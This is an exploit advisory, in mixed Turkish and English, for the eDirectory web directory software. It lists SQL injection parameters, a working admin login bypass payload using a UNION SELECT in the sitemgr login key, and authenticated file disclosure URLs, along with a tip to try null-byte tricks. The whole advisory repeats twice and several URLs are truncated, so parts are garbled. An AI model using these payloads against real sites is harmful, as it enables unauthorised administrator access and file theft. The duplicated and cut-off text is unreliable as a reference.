# Exploit Title/Exploit Başlığı: Admin auth bypass, SQLi and File Disclosure
# Dork: N/A
# Date/Tarih: Mart2019
# Exploit Author/Exploit Yazarı: Efren Diaz
# Vendor Homepage/Yapımcı Sitesi: https://www.edirectory.com/
# Software Link/Yazılımın Linki: N/A
# Version/Versiyon: Bütün versiyonlar
# Tested on/Test Edilen Sistem: Ubuntu 14.04
# CVE : N/A
#Description/Açıklama:
eDirectory, kendi şirket web sitenizi, işletme rehberlerinizi, kupon sitelerinizi, yerel rehberinizi, öncü gen sitelerini ve daha fazlasını oluşturmak için bir web tabanlı bir yazılımdır.
# Administrator Login Bypass
Login SQL injection, yönetini kimlik doğrulamasını önlemek ve direkt olarak admin panele bağlanmamız için kullanılan bir yöntemdir.
# SQL Injection
Links/Linkler:
- https://site.com/lo cation.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]
# Administrator Login Bypass
Link: https://site.com/sitemgr/login.php?key=' union select 0,1,0,'sitemgr' -- -
# File Disclosure (authenticated)
Not:Sadece .php uzantılı dosyalar,fakat eski .php uzantılı dosyalar için null-byte ı deneyin.
Links:
- https://site.com/sitemgr/langcenter...age_area=front&domain_id=1&language_id=[PATH]
- https://site.com/sitemgr/configurat...age_area=front&domain_id=1&language_id=[PATH]
# Dork: N/A
# Date/Tarih: Mart2019
# Exploit Author/Exploit Yazarı: Efren Diaz
# Vendor Homepage/Yapımcı Sitesi: https://www.edirectory.com/
# Software Link/Yazılımın Linki: N/A
# Version/Versiyon: Bütün versiyonlar
# Tested on/Test Edilen Sistem: Ubuntu 14.04
# CVE : N/A
#Description/Açıklama:
eDirectory, kendi şirket web sitenizi, işletme rehberlerinizi, kupon sitelerinizi, yerel rehberinizi, öncü gen sitelerini ve daha fazlasını oluşturmak için bir web tabanlı bir yazılımdır.
# Administrator Login Bypass
Login SQL injection, yönetini kimlik doğrulamasını önlemek ve direkt olarak admin panele bağlanmamız için kullanılan bir yöntemdir.
# SQL Injection
Links/Linkler:
- https://site.com/lo cation.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]
# Administrator Login Bypass
Link: https://site.com/sitemgr/login.php?key=' union select 0,1,0,'sitemgr' -- -
# File Disclosure (authenticated)
Not:Sadece .php uzantılı dosyalar,fakat eski .php uzantılı dosyalar için null-byte ı deneyin.
Links:
- https://site.com/sitemgr/langcenter...age_area=front&domain_id=1&language_id=[PATH]
- https://site.com/sitemgr/configurat...age_area=front&domain_id=1&language_id=[PATH]